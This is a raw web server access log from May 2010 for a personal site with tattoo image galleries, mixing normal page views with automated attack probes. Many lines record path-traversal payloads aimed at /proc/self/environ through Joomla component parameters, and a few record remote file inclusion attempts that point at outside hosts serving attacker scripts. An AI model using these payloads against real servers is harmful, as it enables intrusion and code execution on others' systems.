64.34.169.238 - - [24/May/2010:19:04:50 -0500] "GET /index.php?option=com_myblog&Itemid=17&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.7.192.231 - - [24/May/2010:19:05:44 -0500] "GET /logs////?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6915 "-""libwww-perl/5.834"
66.7.192.231 - - [24/May/2010:19:05:44 -0500] "GET ////?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-""libwww-perl/5.834"
64.34.169.238 - - [24/May/2010:19:08:29 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:08:30 -0500] "GET /index2.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:08:31 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.55.224.242 - - [24/May/2010:19:09:38 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.224.242 - - [24/May/2010:19:09:38 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [24/May/2010:19:09:38 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
203.211.129.170 - - [24/May/2010:19:12:05 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
203.211.129.170 - - [24/May/2010:19:12:06 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.189.224.16 - - [24/May/2010:19:12:19 -0500] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 293 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
213.189.224.16 - - [24/May/2010:19:12:19 -0500] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.thatvilla.com/occupants/New%20Folder/2?? HTTP/1.1" 404 298 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
74.55.224.242 - - [24/May/2010:19:12:47 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.224.242 - - [24/May/2010:19:12:47 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.224.242 - - [24/May/2010:19:12:47 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.34.169.238 - - [24/May/2010:19:13:49 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:13:49 -0500] "GET /index2.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:13:50 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.211.129.170 - - [24/May/2010:19:13:51 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
64.34.169.238 - - [24/May/2010:19:16:52 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=20&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:16:52 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=19&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:16:54 -0500] "GET /index2.php?option=com_myblog&Itemid=19&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:16:54 -0500] "GET /index2.php?option=com_myblog&Itemid=20&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:16:56 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=19&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:16:56 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=20&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.93.240.62 - - [24/May/2010:19:17:34 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.73.180.30 - - [24/May/2010:19:18:34 -0500] "GET /logs////?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6915 "-""libwww-perl/5.810"
69.73.180.30 - - [24/May/2010:19:18:34 -0500] "GET ////?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-""libwww-perl/5.810"
203.211.129.170 - - [24/May/2010:19:21:06 -0500] "GET /logs/access_log.1274313600/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
203.211.129.170 - - [24/May/2010:19:21:06 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
203.211.129.170 - - [24/May/2010:19:21:07 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.142.171.29 - - [24/May/2010:19:22:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:56 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:56 -0500] "GET /KonaBase.js HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:56 -0500] "GET /KonaFlashBase.js HTTP/1.1" 404 300 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:56 -0500] "GET /KonaInfra.js HTTP/1.1" 404 296 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:56 -0500] "GET /FlashKonaLibBaseRM.js HTTP/1.1" 404 305 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:56 -0500] "GET /designParams.js HTTP/1.1" 404 299 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:22:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:14 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:15 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:16 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:17 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:40 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:41 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:41 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:41 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:41 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:41 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:42 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:42 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:44 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:23:44 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
211.239.161.143 - - [24/May/2010:19:24:21 -0500] "GET //step_one.php?server_inc=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.239.161.143 - - [24/May/2010:19:24:21 -0500] "GET /logs//step_one.php?server_inc=http://pkill.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
64.34.169.238 - - [24/May/2010:19:24:27 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:24:27 -0500] "GET /?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:24:27 -0500] "GET /logs/?option=com_myblog&Itemid=10&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
67.142.171.29 - - [24/May/2010:19:24:28 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:28 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
67.142.171.29 - - [24/May/2010:19:24:29 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
64.34.169.238 - - [24/May/2010:19:24:30 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_myblog&Itemid=18&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:24:30 -0500] "GET /index2.php?option=com_myblog&Itemid=18&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.169.238 - - [24/May/2010:19:24:30 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=18&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
